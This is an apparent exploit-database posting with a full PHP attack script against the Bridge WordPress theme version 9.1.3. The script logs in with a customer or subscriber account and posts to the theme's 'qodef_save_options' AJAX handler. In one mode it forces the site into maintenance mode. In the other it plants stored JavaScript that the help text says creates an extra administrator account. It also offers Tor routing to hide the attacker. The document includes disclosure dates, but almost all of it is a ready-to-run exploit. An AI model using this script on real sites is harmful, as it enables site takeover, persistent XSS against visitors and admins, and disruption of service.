WordPress Bridge 9.1.3 Theme Exploit
Posted on 30 November -0001
<?php /** * Exploit Titie: Bridge - Creative Multi-Purpose WordPress Theme Exploit * Google Dork: * Exploit Author: <contact@wp0day.com> * Vendor Homepage: http://bridge.qodeinteractive.com/ * Software Link: http://themeforest.net/item/bridge-creative-multipurpose-wordpress-theme/7315054 * Version: 9.1.3 * Tested on: Debian 8, PHP 5.6.17-3 * Type: Stored XSS, Ability to overwrite any theme settings. * Time line: Found [23-Apr-2016], Vendor notified [23-Apr-2016], Vendor fixed: [Yes], [RD:1] */ require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); $curl = new CurlWrapper(); $options = getopt("t:m:u:p:f:c:",array('tor:')); print_r($options); $options = validateInput($options); if (!$options){ showHelp(); } if ($options['tor'] === true) { echo " ### USING TOR ### "; echo "Setting TOR Proxy... "; $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); $curl->addOption(CURLOPT_PROXYTYPE,7); echo "Checking IPv4 Address "; $curl->get('https://dynamicdns.park-your-domain.com/getip'); echo "Got IP : ".$curl->getResponse()." "; echo "Are you sure you want to do this? Type 'wololo' to continue: "; $answer = fgets(fopen ("php://stdin","r")); if(trim($answer) != 'wololo'){ die("Aborting! "); } echo "OK... "; } function logIn(){ global $curl, $options; file_put_contents('cookies.txt'," "); $curl->setCookieFile('cookies.txt'); $curl->get($options['t']); $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); $curl->post($options['t'].'/wp-login.php', $data); $status = $curl->getTransferInfo('http_code'); if ($status !== 302){ echo "Login probably failed, aborting... "; echo "Login response saved to login.html. "; die(); } file_put_contents('login.html',$curl->getResponse()); } function exploit(){ global $curl, $options; switch ($options['m']){ case 'm' : //Maintanence mode echo "Putting site in maintenece mode "; $data = array('action' => 'qodef_save_options', 'qode_maintenance_mode'=>'yes'); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); $resp = $curl->getResponse(); echo "Response: ".$resp." "; break; case 'x' : //XSS Mode, create extra admin echo "Injecting inject.js "; $data = array('action' => 'qodef_save_options', 'custom_js'=>file_get_contents(dirname(__FILE__)."/inject.js")); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); $resp = $curl->getResponse(); echo "Response: ".$resp." "; break; } } logIn(); exploit(); function validateInput($options){ if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ return false; } if ( !isset($options['u']) ){ return false; } if ( !isset($options['p']) ){ return false; } if (!preg_match('~/$~',$options['t'])){ $options['t'] = $options['t'].'/'; } if (!isset($options['m']) || !in_array($options['m'], array('m','x') ) ){ return false; } $options['tor'] = isset($options['tor']); return $options; } function showHelp(){ global $argv; $help = <<<EOD Bridge Theme Exploit, Stored XSS, Create Admin account. Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE] *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" ** [TARGET_URL] http://localhost/wordpress/ [MODE] x - Permanent XSS DEMO, m - Maintenance Mode Examples: php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m x php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m m Misc: CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru> @link http://github.com/svyatov/CurlWrapper @license http://www.opensource.org/licenses/mit-license.html MIT License EOD; echo $help." "; die(); }
